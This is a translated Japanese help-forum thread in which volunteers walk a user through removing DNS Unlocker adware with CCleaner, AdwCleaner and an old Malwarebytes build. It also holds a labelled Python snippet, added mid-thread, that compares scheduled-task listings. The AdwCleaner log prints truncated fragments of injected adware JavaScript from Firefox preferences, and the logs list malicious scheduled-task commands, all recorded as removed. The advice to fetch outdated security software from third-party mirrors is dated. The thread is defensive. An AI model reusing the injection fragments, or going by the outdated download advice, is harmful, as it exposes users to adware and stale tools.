有効 HKLM:Run SuiteTray Egis Technology Inc. "C:\Program Files (x86)\EgisTec MyWinLockerSuite\x86\SuiteTray.exe"
有効 HKLM:Run SunJavaUpdateSched Oracle Corporation "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
有効 Startup User Dropbox.lnk Dropbox, Inc. C:\Users\【ユーザー名】\AppData\Roaming\Dropbox\bin\Dropbox.exe


cc Scheduled tasks ----------------------------

有効 Task Adobe Acrobat Update Task Adobe Systems Incorporated C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
有効 Task Adobe Flash Player Updater Adobe Systems Incorporated C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
有効 Task ASP "C:\Program Files (x86)\RCP\systweakasp.exe" /verysilent
有効 Task CCleanerSkipUAC Piriform Ltd "C:\Program Files\CCleaner\CCleaner.exe" $(Arg0)
有効 Task DNSKINGSTON C:\Program Files (x86)\DNS Unlocker\dnskingston.exe /Scheduled
有効 Task DropboxUpdateTaskUserS-1-5-21-2268393351-900118556-74167924-1000Core Dropbox, Inc. C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe /c
有効 Task DropboxUpdateTaskUserS-1-5-21-2268393351-900118556-74167924-1000UA Dropbox, Inc. C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe /ua /installsource scheduler
有効 Task GoogleUpdateTaskMachineCore Google Inc. C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
有効 Task GoogleUpdateTaskMachineUA Google Inc. C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
有効 Task PMMUpdate Egis Technology Inc. "C:\Program Files\EgisTec IPS\PMMUpdate.exe"
有効 Task Superclean Super PC Tools Ltd c:\programdata\{8af9c87d-c817-cd80-8af9-9c87dc8121f7}\hqghumeaylnlf.exe --startup=1 --single
有効 Task UALU notificatin Acer Incorporated "C:\Program Files\Acer\Acer Updater\UALU.exe"
有効 Task {D0CA0B4E-A50D-488A-974E-DEB3A0548969} Google Inc. "c:\program files (x86)\google\chrome\application\chrome.exe" http://ui.skype.com/ui/0/6.20.0.104/ja/abandoninstall?page=tsProgressBar
有効 Task {F51C8655-EEE7-4AE9-BD50-27F95EBF038F} Microsoft Corporation C:\Windows\system32\pcalua.exe -a E:\install.exe -d E:\ -c /a


cc Context menu ------------------------------

有効 Directory 7-Zip Igor Pavlov C:\Program Files\7-Zip\7-zip.dll
有効 Directory DropboxExt Dropbox, Inc. C:\Users\【ユーザー名】\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll
有効 Directory ShExplzh pon software C:\Windows\SysWOW64\ShExplzh.dll
有効 Directory ShExplzh64 pon software C:\Windows\system32\shexplzh.dll
有効 Directory VLCメディアプレイヤーで再生 VideoLAN "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --no-playlist-enqueue "%1"
有効 Directory VLCメディアプレイヤーのプレイリストに追加 VideoLAN "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --playlist-enqueue "%1"
有効 Directory 書庫内検索(I)... pon software C:\Program Files\Explzh\Explzh.exe /f %1
有効 Drive ShExplzh64 pon software C:\Windows\system32\shexplzh.dll
有効 Drive 書庫内検索(I)... pon software C:\Program Files\Explzh\Explzh.exe /f %1
有効 File 7-Zip Igor Pavlov C:\Program Files\7-Zip\7-zip.dll
有効 File DropboxExt Dropbox, Inc. C:\Users\【ユーザー名】\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll
有効 File MWLIVShellExt Egis Technology Inc. C:\Program Files (x86)\EgisTec MyWinLocker\x64\MWLIVShellExt.dll
有効 File ShExplzh pon software C:\Windows\SysWOW64\ShExplzh.dll
有効 File ShExplzh64 pon software C:\Windows\system32\shexplzh.dll
有効 File ShredderContextMenu Egis Technology Inc. C:\Program Files (x86)\EgisTec Shredder\x64\ShredderContextMenu.dll
有効 Folder ShExplzh64 pon software C:\Windows\system32\shexplzh.dll


That is all. Thank you in advance for your help.

  • あすとろ
  • 2015/09/08 (Tue) 00:59:19
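Starting with a brute-force removal of Chrome
Thank you for doing the work and reporting back.

>I tried using the browser for just a little while, and the symptoms have still not gone away.

OK, understood.
As for the Windows Update problem, IVNO has made a patch file for it, so please try this.
http://respondent.bbs.fc2.com/?act=reply&tid=6857478

Having seen the follow-up logs as well, the things that were hiding have now been smoked out.
So here is the next round of work; please follow the explanation again.

First, if there are Chrome bookmarks you need, export (back up) the bookmarks.
This is preparation, because Chrome is going to be removed once.

Once you are ready, use GU in Safe Mode to uninstall the following.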
>Google Chrome Google Inc. 2015/09/03 45.0.2454.85
>Google 日本語入力 Google Inc. 2015/09/03 87.1 MB 2.17.2267.0

After uninstalling, restart the PC in normal mode, run Disk Cleanup, then open the C drive and look for the folders below by eye; if you find them, delete them.
C:\Program Files (x86)\Google

C:\Users\ユーザー名\AppData\Local\Google

C:\Users\ユーザー名\AppData\LocalLow\Google

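If you find them, delete them manually. Any that you cannot find can simply be skipped.

Once you have got this far, restart the PC once, then download the latest version of Chrome again from the official Google site and reinstall it; the rogue extensions should then be gone as well.

However, if you are not going to use Chrome from now on, you do not need to reinstall it.
If anything, that would be the easier way to handle this.

Next, start CC and, in the "Scheduled Tasks" tab, right-click each of the entries below, choose "Disable", and then go on to "Delete entry".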
有効 Task ASP "C:\Program Files (x86)\RCP\systweakasp.exe" /verysilent

有効 Task DNSKINGSTON C:\Program Files (x86)\DNS Unlocker\dnskingston.exe /Scheduled

有効 Task Superclean Super PC Tools Ltd c:\programdata\{8af9c87d-c817-cd80-8af9-9c87dc8121f7}\hqghumeaylnlf.exe --startup=1 --single

有効 Task {F51C8655-EEE7-4AE9-BD50-27F95EBF038F} Microsoft Corporation C:\Windows\system32\pcalua.exe -a E:\install.exe -d E:\ -c /a

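If an entry cannot be disabled, you can just delete it as it is.

After that, restart the PC once; if you have reinstalled Chrome, start it and watch how the PC behaves for a while, then take fresh logs of just the Chrome tab and the scheduled tasks tab in CC and post them in a reply together with a status report.

If all goes well, things may calm down somewhat at this point, but whether they do or not, this does not yet count as "solved", so there is no need to be impatient about that either.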
  • 悪代官
  • 2015/09/08 (Tue) 20:38:03
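Re: DNSunlocker infection
>As for the Windows Update problem, IVNO has made a patch file for it, so please try this.

Thank you for going to the trouble of making a patch. However, applying the patch did not solve the problem, and now "Error code: 80070002" is displayed.

https://support.microsoft.com/ja-jp/kb/910336

I tried following the URL above, but nothing changed.


As for Chrome, it is after all the browser I find easiest to use, so I decided to reinstall it.
As a status report: I am no longer sent to strange link destinations as before, and in Chrome things seem to have calmed down.

I am pasting the logs below.


chrome------------------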

有効 App Gmail 8.1 ユーザー 1 C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0
有効 App Google Search 0.0.0.30 ユーザー 1 C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.30_0
有効 App Google ドライブ 14.0 ユーザー 1 C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.0_0
有効 App YouTube 4.2.7 ユーザー 1 C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.7_0
有効 Extension Google スプレッドシート 1.1 ユーザー 1 C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0
有効 Extension Google スライド 0.9 ユーザー 1 C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0
有効 Extension Google ドキュメント 0.9 ユーザー 1 C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0
有効 Extension Google ドキュメント オフライン 0.5 ユーザー 1 C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\0.5_1


Schedule---------------------

有効 Task Adobe Acrobat Update Task Adobe Systems Incorporated C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
有効 Task Adobe Flash Player Updater Adobe Systems Incorporated C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
有効 Task CCleanerSkipUAC Piriform Ltd "C:\Program Files\CCleaner\CCleaner.exe" $(Arg0)
有効 Task DropboxUpdateTaskUserS-1-5-21-2268393351-900118556-74167924-1000Core Dropbox, Inc. C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe /c
有効 Task DropboxUpdateTaskUserS-1-5-21-2268393351-900118556-74167924-1000UA Dropbox, Inc. C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe /ua /installsource scheduler
有効 Task GoogleUpdateTaskMachineCore Google Inc. C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
有効 Task GoogleUpdateTaskMachineUA Google Inc. C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
有効 Task PMMUpdate Egis Technology Inc. "C:\Program Files\EgisTec IPS\PMMUpdate.exe"
有効 Task UALU notificatin Acer Incorporated "C:\Program Files\Acer\Acer Updater\UALU.exe"
有効 Task {D0CA0B4E-A50D-488A-974E-DEB3A0548969} Google Inc. "c:\program files (x86)\google\chrome\application\chrome.exe" http://ui.skype.com/ui/0/6.20.0.104/ja/abandoninstall?page=tsProgressBar
  • あすとろ
  • 2015/09/09 (Wed) 08:57:58
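Added example, not part of any post in this thread: a Python check that compares the scheduled-task listing from before the cleanup with the one posted afterwards and confirms that the four entries singled out for deletion are gone. The listings are excerpts of the CCleaner output quoted in the thread; the function names and report keys are this example's own.

```python
import re

# CCleaner marks every entry as 有効 (enabled) or 無効 (disabled).
STATES = {"有効": "enabled", "無効": "disabled"}
# The command starts at the first drive-letter path, which may be quoted.
CMD_START = re.compile(r'"?[A-Za-z]:\\')

# Excerpts of the listings quoted in the thread (not the full logs).
BEFORE = r"""
有効 Task Adobe Acrobat Update Task Adobe Systems Incorporated C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
有効 Task ASP "C:\Program Files (x86)\RCP\systweakasp.exe" /verysilent
有効 Task CCleanerSkipUAC Piriform Ltd "C:\Program Files\CCleaner\CCleaner.exe" $(Arg0)
有効 Task DNSKINGSTON C:\Program Files (x86)\DNS Unlocker\dnskingston.exe /Scheduled
有効 Task GoogleUpdateTaskMachineCore Google Inc. C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
有効 Task Superclean Super PC Tools Ltd c:\programdata\{8af9c87d-c817-cd80-8af9-9c87dc8121f7}\hqghumeaylnlf.exe --startup=1 --single
有効 Task {F51C8655-EEE7-4AE9-BD50-27F95EBF038F} Microsoft Corporation C:\Windows\system32\pcalua.exe -a E:\install.exe -d E:\ -c /a
"""

AFTER = r"""
有効 Task Adobe Acrobat Update Task Adobe Systems Incorporated C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
有効 Task CCleanerSkipUAC Piriform Ltd "C:\Program Files\CCleaner\CCleaner.exe" $(Arg0)
有効 Task GoogleUpdateTaskMachineCore Google Inc. C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
"""

# The four entries the helper's post asked to disable and delete.
TARGETS = r"""
有効 Task ASP "C:\Program Files (x86)\RCP\systweakasp.exe" /verysilent
有効 Task DNSKINGSTON C:\Program Files (x86)\DNS Unlocker\dnskingston.exe /Scheduled
有効 Task Superclean Super PC Tools Ltd c:\programdata\{8af9c87d-c817-cd80-8af9-9c87dc8121f7}\hqghumeaylnlf.exe --startup=1 --single
有効 Task {F51C8655-EEE7-4AE9-BD50-27F95EBF038F} Microsoft Corporation C:\Windows\system32\pcalua.exe -a E:\install.exe -d E:\ -c /a
"""


def parse_task(line):
    """Return (state, normalized command line) for one 'Task' row, else None."""
    parts = line.split(None, 2)
    if len(parts) < 3 or parts[0] not in STATES or parts[1] != "Task":
        return None
    match = CMD_START.search(parts[2])
    if not match:
        return None
    # Name and publisher columns are not reliably separable once the columns
    # are flattened to spaces, so the command line itself is used as the key.
    command = parts[2][match.start():].replace('"', "")
    return STATES[parts[0]], " ".join(command.split()).lower()


def load(listing):
    """Map normalized command line -> state for every Task row in a listing."""
    tasks = {}
    for line in listing.splitlines():
        parsed = parse_task(line)
        if parsed:
            state, command = parsed
            tasks[command] = state
    return tasks


def verify_cleanup(before, after, targets):
    """Report what happened to each targeted task between two listings."""
    before_t, after_t, target_t = load(before), load(after), load(targets)
    return {
        # Targeted, seen before, absent afterwards: removal confirmed.
        "removed": sorted(c for c in target_t if c in before_t and c not in after_t),
        # Targeted and still listed; a merely disabled task is still present.
        "still_present": {c: after_t[c] for c in target_t if c in after_t},
        # Targeted but never in the "before" listing (typo or wrong log).
        "never_listed": sorted(c for c in target_t if c not in before_t),
        # Tasks that appeared only after the cleanup and need a second look.
        "unexpected_new": sorted(c for c in after_t if c not in before_t),
    }


if __name__ == "__main__":
    for key, value in verify_cleanup(BEFORE, AFTER, TARGETS).items():
        print(key, value)
```

A task that was only disabled and not deleted stays in `still_present` with state `disabled`, so it is not mistaken for a completed removal.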
Please try this as well
The URL from earlier is mainly for Windows XP.
Just in case, please try this one as well.
http://windows.microsoft.com/ja-jp/windows/windows-update-error-80070002#1TC=windows-7

For the rest of the work, please wait for 悪代官's guidance.
  • IVNO
  • 2015/09/09 (Wed) 16:17:00
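Re: DNSunlocker infection
>The URL from earlier is mainly for Windows XP.
Just in case, please try this one as well.
http://windows.microsoft.com/ja-jp/windows/windows-update-error-80070002#1TC=windows-7

I tried this one too, but it did not work…

Things are not resolved yet, so I would like to try it again after they are.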
  • あすとろ
  • 2015/09/10 (Thu) 01:47:53
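Next, work with the stable version of MBAM
Sorry for the late reply.

>I tried this one too, but it did not work…

OK. Chrome itself seems to have calmed down after the reinstall, so for now let's move on to the next step.

This time, please get the following tools ready.
"AdwCleaner" (commonly: AC)
http://www.bleepingcomputer.com/download/adwcleaner/dl/125/
This is a direct link to the file. Open it and save the file somewhere such as the desktop.
When you are finished with it, start it and press the "uninstall" button, and it will be removed automatically.
The site below has a detailed explanation of how to use it, so please refer to it ↓
http://www.japan-secure.com/entry/adwcleaner.html

Malwarebytes' Anti-Malware (commonly: MBAM)
Official site
http://www.malwarebytes.org/

However, MBAM currently has considerable problems with stability and behaviour, and bugs that prevent it from scanning properly even in normal use are occurring frequently.
For that reason, do not download the latest version from the official site; here we will deliberately work with an old version.

Site explaining the old version ↓
http://www.japan-secure.com/entry/blog-entry-7.html

Download the old version of MBAM from the URL below.
http://www.oldapps.com/malwarebytes.php?old_malwarebytes=12090?download
This is a direct link to the file. Please save it.

Note: if you install in Japanese, the text may come out garbled. Install in English and then switch to Japanese afterwards.
Start MBAM and go to the "Settings" tab → "Language" → "Japanese" to switch it to Japanese.

Once you are ready, install MBAM and go as far as updating it.
However, do not scan yet at this point.
Also, when updating MBAM here, do not update the "program" itself; update only the definitions.
If you update the program itself, it becomes the latest version with its many bugs, and there would have been no point in installing the old version.

Next, start AC once at this point.
When it starts, it should first update its definitions, so let it update only, and once that is done, close AC for now.
There is no need to scan here either.

Once both tools are updated, restart the PC in Safe Mode and use Disk Cleanup to clear out junk files.

Next, with the PC started in Safe Mode, start AC again (the one you started once earlier).
Once it is running, this time press "Scan", and after the scan finishes, if anything was detected, press "Remove".
Choosing "Yes" on the screen that appears starts the cleanup.

When the cleanup is complete, restart the PC in normal mode.

After the restart, a new AC log will appear; save it somewhere such as the desktop.
However, if no log appears after the work, or you cannot tell, open the C drive in My Computer; a file with a name like the following will have been created directly under it, and that is the AC log.
>AdwCleaner[alphanumeric characters].txt
If there are several logs with similar names, the one whose creation time matches when you did the cleanup is the log in question.

Once the AC work is done, next is the MBAM work.
Staying in Safe Mode, start MBAM and scan.
After starting MBAM, go to the "Scanner" tab and choose "Full scan".
Select all drives, including C, as targets.
However, if no "Full scan" button is shown, MBAM may have been updated to the latest version; in that case choose "Custom scan".
This is the equivalent of a full scan in the latest MBAM.
Select (tick) all drives as scan targets. It takes time, but the point is to scan as thoroughly as possible.
The order does not matter, but if anything is detected, select it and "remove" (quarantine) it, and if a prompt to restart appears, restart the PC at that point.
If no restart prompt appears, restart manually.

Also, after the MBAM scan finishes, pressing "Show details" should display the results, and pressing "Save log" there lets you save the log.
Save that log somewhere such as the desktop.
Checking this log is especially important, so please do not forget.

After this, watch how the PC behaves for a while, then paste the AC and MBAM logs you saved after the work into your reply and show them to me together with a status report.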
  • 悪代官
  • 2015/09/10 (Thu) 07:49:51
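Re: DNSunlocker infection
Sorry for the delay.

The MBAM full scan finished and I tried to save the log, but when I clicked "Show details" a pop-up appeared, and when I pressed OK the items were removed before I could save the log…

In the Settings tab, "Automatically save a log file after the scan completes." is ticked, so I think it has been saved, but I do not know where, so I have come to ask.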
  • あすとろ
  • 2015/09/10 (Thu) 20:10:43
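Steps for checking the MBAM log
Thank you for doing the work and reporting back.

So you are stuck on saving the MBAM log.
Then please try checking the log with the steps below.

First, start the old-version MBAM and open the "Logs" tab.

A list for each date and time you scanned with MBAM will appear there; select the log for the date and time you did the work and press the "Open" button.

Normally this displays the log, so please show me that log in a reply again.
However, if you cannot find the log here either, skip the MBAM log and just let me know that.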
  • 悪代官
  • 2015/09/10 (Thu) 21:13:10
Re: DNSunlocker infection
I checked, but there was no log.

It is a minor detail, but the number of detected files was shown as 12.
  • あすとろ
  • 2015/09/10 (Thu) 22:10:42
Re: DNSunlocker infection
The AC work is finished, so I will paste that log first.

# AdwCleaner v5.007 - ログファイルの作成日 10/09/2015 作成時間 16:29:30
# 更新日 08/09/2015 作成元 Xplode
# データベース : 2015-09-08.2 [サーバー]
# オペレーティングシステム : Windows 7 Home Premium Service Pack 1 (x64)
# ユーザー名 : 【ユーザー名】
# 実行場所 : C:\Users\【ユーザー名】\Desktop\AdwCleaner.exe
# オプション : 削除
# サポート : http://toolslib.net/forum

***** [ サービス ] *****


***** [ フォルダ ] *****

[-] フォルダ 削除済み項目 : C:\Program Files (x86)\LibraryModule
[-] フォルダ 削除済み項目 : C:\ProgramData\apn
[-] フォルダ 削除済み項目 : C:\ProgramData\IHProtectUpDate
[-] フォルダ 削除済み項目 : C:\ProgramData\2e5e509600007f88
[-] フォルダ 削除済み項目 : C:\ProgramData\3a93476400003d67
[-] フォルダ 削除済み項目 : C:\ProgramData\486547940152927884
[-] フォルダ 削除済み項目 : C:\ProgramData\ab6f77b800000244
[-] フォルダ 削除済み項目 : C:\ProgramData\b717da8c00001308
[-] フォルダ 削除済み項目 : C:\ProgramData\{8af9c87d-c817-cd80-8af9-9c87dc8121f7}
[-] フォルダ 削除済み項目 : C:\Users\【ユーザー名】\AppData\Roaming\OpenCandy
[-] フォルダ 削除済み項目 : C:\Users\【ユーザー名】\AppData\Roaming\Systweak

***** [ ファイル ] *****

[-] ファイル 削除済み項目 : C:\END
[-] ファイル 削除済み項目 : C:\Program Files (x86)\mozilla firefox\dbghelp.dll
[-] ファイル 削除済み項目 : C:\Windows\Sysnative\roboot64.exe
[-] ファイル 削除済み項目 : C:\Windows\Sysnative\drivers\{72074a89-563a-4402-894b-cfea7ec6858b}Gw64.sys

***** [ ショートカット ] *****


***** [ スケジュールタスク ] *****


***** [ レジストリ ] *****

[-] キー 削除済み項目 : HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\WindowsMangerProtect
[-] キー 削除済み項目 : HKCU\Software\Mozilla\Extends
[-] キー 削除済み項目 : HKLM\SOFTWARE\5da059a482fd494db3f252126fbc3d5b
[-] キー 削除済み項目 : HKLM\SOFTWARE\90327e2b-5082-dd87-c103-0f092310d727
[-] キー 削除済み項目 : HKLM\SOFTWARE\c6bad4c9-8421-425b-1b68-21b04eceea82
[-] キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{cde50c8b}
[-] 値 削除済み項目 : HKLM\SOFTWARE\Mozilla\Firefox\Extensions [faststartff@gmail.com]
[-] キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{5A4E3A41-FA55-4BDA-AED7-CEBE6E7BCB52}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{459DD0F7-0D55-D3DC-67BC-E6BE37E9D762}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Classes\Interface\{4E6354DE-9115-4AEE-BD21-C46C3E8A49DB}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Classes\Interface\{FC073BDA-C115-4A1D-9DF9-9B5C461482E5}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Classes\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Classes\TypeLib\{A2D733A7-73B0-4C6B-B0C7-06A432950B66}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Classes\TypeLib\{1DB3812C-B5BC-4714-8F98-4669354B6000}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Classes\TypeLib\{41F978F3-431A-4464-A789-5C0692D562FB}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Classes\TypeLib\{5ADB067E-40D9-49AD-BDFC-2DBD725D3842}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Classes\TypeLib\{89310413-97E0-4F09-AA75-390A7F4D4918}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Classes\TypeLib\{917A80E3-C425-4F5F-B8D3-4804A0CCA924}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Classes\TypeLib\{A1965763-A486-4E1E-B574-19E44B3842E8}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Classes\TypeLib\{B83055E5-D13F-4DB9-A034-3B89A4CFE680}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Classes\TypeLib\{BB2DE3E8-09DB-47F2-8F99-658751BFB500}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Classes\TypeLib\{C3510196-382C-41D1-8E63-6E84DB3709C9}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Classes\TypeLib\{EB559340-3A8F-4456-B24D-160098054EF0}
[-] キー 削除済み項目 : [x64] HKLM\SOFTWARE\Classes\CLSID\{5A4E3A41-FA55-4BDA-AED7-CEBE6E7BCB52}
[-] キー 削除済み項目 : [x64] HKLM\SOFTWARE\Classes\Interface\{4E6354DE-9115-4AEE-BD21-C46C3E8A49DB}
[-] キー 削除済み項目 : [x64] HKLM\SOFTWARE\Classes\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}
[-] キー 削除済み項目 : [x64] HKLM\SOFTWARE\Classes\Interface\{FC073BDA-C115-4A1D-9DF9-9B5C461482E5}
[-] キー 削除済み項目 : HKU\.DEFAULT\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
[-] キー 削除済み項目 : HKCU\Software\InstallCore
[-] キー 削除済み項目 : HKCU\Software\systweak
[-] キー 削除済み項目 : HKCU\Software\UpdateStar
[-] キー 削除済み項目 : HKCU\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
[-] キー 削除済み項目 : HKCU\Software\AppDataLow\Software\ViewPassword
[-] キー 削除済み項目 : HKLM\SOFTWARE\{1146AC44-2F03-4431-B4FD-889BC837521F}
[-] キー 削除済み項目 : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
[-] キー 削除済み項目 : HKLM\SOFTWARE\{6791A2F3-FC80-475C-A002-C014AF797E9C}
[-] キー 削除済み項目 : HKLM\SOFTWARE\SupTab
[-] キー 削除済み項目 : HKLM\SOFTWARE\systweak
[-] キー 削除済み項目 : HKLM\SOFTWARE\IHProtect
[-] キー 削除済み項目 : HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{614925F9-841A-53FE-A28F-DC30FA07239B}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8B114619-78B7-1CFF-55EF-74266954F883}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}_is1
[-] キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7540FDBD-7FDC-30AE-3778-815CB87DBE46}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F6423EE4-93D8-FA04-D09D-A8598F6EFDFD}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{10A0E600-D246-BD63-F465-4C849C688998}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5E03DFA7-51FC-7C12-CEE5-4D75FBB01E8F}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7E7FAE3D-3358-D280-8DBF-E8E2D94326D1}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{EE171732-BEB4-4576-887D-CB62727F01CA}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B10BC31B-DBC6-56FE-DD3D-DD4E49A3E6CE}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2616871-3463-BCEE-5AFA-73773317A381}
[!] キー ノット 削除済み項目 : [x64] HKCU\Software\InstallCore
[!] キー ノット 削除済み項目 : [x64] HKCU\Software\systweak
[!] キー ノット 削除済み項目 : [x64] HKCU\Software\UpdateStar
[!] キー ノット 削除済み項目 : HKU\S-1-5-21-2268393351-900118556-74167924-1000\Software\AppDataLow\Software\ViewPassword
[-] データ 復元済み項目 : HKCU\Software\Microsoft\Internet Explorer\Main [Search Page]
[-] データ 復元済み項目 : HKU\S-1-5-21-2268393351-900118556-74167924-1000\Software\Microsoft\Internet Explorer\Main [Search Page]

***** [ Webブラウザ ] *****

[-] [C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\i4n38c5y.default\prefs.js] [Preference] 削除済み項目 : user_pref("extensions.4u0dFaxhuTzGvfiD.scode", "(function(){try{if(window.location.href.indexOf(\"rjg4pdC5rjC8qjY9qTw5rHa8rTw\")>-1){return;}}catch(e){}try{var d=[[\"www.ewoss.com\",\"livewebcams.xyz\[...]
[-] [C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\i4n38c5y.default\prefs.js] [Preference] 削除済み項目 : user_pref("extensions.ES2GPs0mln4WhkmQ.scode", "(function(){try{if(window.location.href.indexOf(\"rHU6pjw7qda7pjnErdg8pda8rn\")>-1){return;}}catch(e){}try{var d=[[\"cryptogmail.com\",\"bancdebinary.co[...]
[-] [C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\i4n38c5y.default\prefs.js] [Preference] 削除済み項目 : user_pref("extensions.FCjaZCGs31M2vgEr.scode", "(function(){try{if(window.location.href.indexOf(\"rjg4pdC5rjC8qjY9qTw5rHa8rTw\")>-1){return;}}catch(e){}try{var d=[[\"www.ewoss.com\",\"livewebcams.xyz\[...]
[-] [C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\i4n38c5y.default\prefs.js] [Preference] 削除済み項目 : user_pref("extensions.HL9UWkqiOWgLo30O.scode", "(function(){try{if(window.location.href.indexOf(\"rHU6pjw7qda7pjnErdg8pda8rn\")>-1){return;}}catch(e){}try{var d=[[\"cryptogmail.com\",\"bancdebinary.co[...]
[-] [C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\i4n38c5y.default\prefs.js] [Preference] 削除済み項目 : user_pref("extensions.doCfAZEi4WbW8ZlS.scode", "(function(){try{if(window.location.href.indexOf(\"rjg4pdC5rjC8qjY9qTw5rHa8rTw\")>-1){return;}}catch(e){}try{var d=[[\"www.ewoss.com\",\"livewebcams.xyz\[...]
[-] [C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\i4n38c5y.default\prefs.js] [Preference] 削除済み項目 : user_pref("extensions.gVloVT64oSQvcz0v.scode", "(function(){try{if(window.location.href.indexOf(\"rHU6pjw7qda7pjnErdg8pda8rn\")>-1){return;}}catch(e){}try{var d=[[\"cryptogmail.com\",\"bancdebinary.co[...]
[-] [C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\i4n38c5y.default\prefs.js] [Preference] 削除済み項目 : user_pref("extensions.iO9wA7wGp2hsyOy3.scode", "(function(){try{if(window.location.href.indexOf(\"rjg4pdC5rjC8qjY9qTw5rHa8rTw\")>-1){return;}}catch(e){}try{var d=[[\"www.ewoss.com\",\"livewebcams.xyz\[...]
